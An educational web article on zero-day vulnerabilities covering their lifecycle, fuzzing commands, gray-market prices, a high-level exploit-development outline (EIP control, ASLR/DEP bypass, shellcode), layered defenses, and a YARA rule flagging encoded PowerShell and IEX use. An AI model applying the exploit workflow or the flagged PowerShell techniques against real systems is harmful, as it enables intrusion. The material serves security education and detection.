Key Takeaways

  • Zero-day = unknown to vendor, no patch exists
  • iOS zero-days sell for $2M+ on gray market
  • Fuzzing is primary discovery method
  • Defense in depth mitigates unknown threats
Contents

1. What is a Zero-Day?

A zero-day (0-day) vulnerability is a software flaw unknown to the vendor or public. The term "zero-day" refers to the fact that developers have had zero days to fix it. Zero-day exploits leverage these vulnerabilities before patches exist.

Terminology

2. Zero-Day Lifecycle

  1. Discovery: Researcher/attacker finds vulnerability
  2. Weaponization: Exploit code developed
  3. Exploitation: Used in attacks (if malicious)
  4. Disclosure: Reported to vendor or made public
  5. Patch release: Vendor creates fix
  6. Patch adoption: Users apply updates
The Danger Window

The time between exploit discovery and patch deployment is when organizations are most vulnerable. Average time-to-patch is 60-150 days for critical vulnerabilities.

3. Discovery Methods

Fuzzing

# AFL (American Fuzzy Lop)
afl-fuzz -i input_dir -o output_dir -- ./target @@

# LibFuzzer
clang -fsanitize=fuzzer,address target.c -o fuzzer
./fuzzer corpus/

# Honggfuzz
honggfuzz -i input_dir -- ./target ___FILE___

# Fuzzing finds crashes → analyze for exploitability

Code Auditing

# Static analysis tools
- Semgrep (pattern matching)
- CodeQL (semantic analysis)
- Coverity (enterprise)

# Manual code review focuses on:
- Memory management (malloc/free)
- Input validation
- Integer overflows
- Type confusion
- Logic flaws

Reverse Engineering

# Binary analysis with Ghidra/IDA
# Look for:
- Dangerous functions (strcpy, sprintf)
- Missing bounds checks
- Type mismatches
- Race conditions

4. Zero-Day Market

Market Types

Approximate Prices (2024)

TargetPrice Range
iOS Zero-Click RCE$2,000,000+
Android Zero-Click$1,500,000+
Windows RCE$500,000 - $1,000,000
Chrome RCE + Sandbox Escape$500,000+
Enterprise Server RCE$100,000 - $500,000

5. Famous Zero-Days

6. Exploit Development Basics

# Exploit development workflow:
1. Identify vulnerability (crash analysis)
2. Understand root cause (debugging)
3. Control execution flow (EIP/RIP control)
4. Bypass mitigations (ASLR, DEP, CFG)
5. Achieve code execution (shellcode)
6. Weaponize (reliable exploit)

# Modern mitigations to bypass:
- ASLR: Information leaks
- DEP/NX: ROP chains
- Stack Canaries: Leak or bypass
- CFG/CFI: Corruption primitives

7. Defense Against Zero-Days

Multiple Layers of Defense
  • Endpoint Detection (EDR): Behavioral analysis catches unknown threats
  • Network segmentation: Limits lateral movement
  • Application sandboxing: Contain exploit impact
  • Least privilege: Limits what exploits can access
  • Exploit mitigations: ASLR, DEP, CFG enabled
  • Threat intelligence: IOCs for emerging threats
  • Patch quickly: Reduce N-day exposure window

8. Threat Hunting for Zero-Days

# Hunt for anomalies, not signatures
# Look for:
- Unusual process execution chains
- Living off the land techniques
- Memory-only malware
- Abnormal network connections
- Privilege escalation patterns

# YARA rules for behavioral patterns
rule Suspicious_PowerShell {
    strings:
        $a = "-enc" nocase
        $b = "-nop" nocase
        $c = "IEX" nocase
    condition:
        2 of them
}

FAQ

How are zero-days discovered?
Primarily through fuzzing, code auditing, and reverse engineering. Some are found accidentally during normal development or security research.
Should I sell zero-days?
Bug bounties and vendor programs are the ethical choice. Selling to gray/black market actors may be legal but enables surveillance and attacks.

Malware Analysis Memory Corruption Reverse Engineering